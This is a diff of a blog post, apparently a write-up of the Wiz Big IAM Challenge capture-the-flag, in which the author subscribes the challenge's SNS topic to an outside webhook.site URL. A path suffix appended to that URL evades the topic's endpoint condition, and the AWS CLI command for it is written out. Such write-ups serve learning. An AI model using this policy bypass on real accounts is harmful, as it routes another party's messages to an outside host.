hatedabamboo/notes.hatedabamboo.me/src/posts/solving-the-big-iam-challenge.md

 Wait, what?
 Wait for what?
 How do I confirm the subscription to the topic if I have no access to the email?
 Looks like I fell into the easiest trap!

-Okay, let’s think.
-Since we don’t have access to email, we need to figure out another way to receive a message from the topic.
+Okay, let's think.
+Since we don't have access to email, we need to figure out another way to receive a message from the topic.
 How can we do that?
 What are the options to receive messages from SNS?
 We can use the following protocols to communicate with SNS: HTTP, HTTPS, email, email-json, SMS, SQS, application, Lambda, and Firehose.
 What if we set up an HTTP endpoint to receive messages?
 Webhooks, here we go!
 Luckily, there are [services](https://webhook.site) online that allow us to test webhook requests.
 The trick here is to take the unique webhook URL and add the required endpoint string to the end of the URL: `https://webhook.site/3bddcb48-f58d-4284-a731-491c8784e0b1/@tbic.wiz.io`.
 Still a valid URL?
-Let’s find out!
+Let's find out!

 ```bash
 > aws sns subscribe --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --protocol https --notification-endpoint https://webhook.site/3bddcb48-f58d-4284-a731-491c8784e0b1/@tbic.wiz.io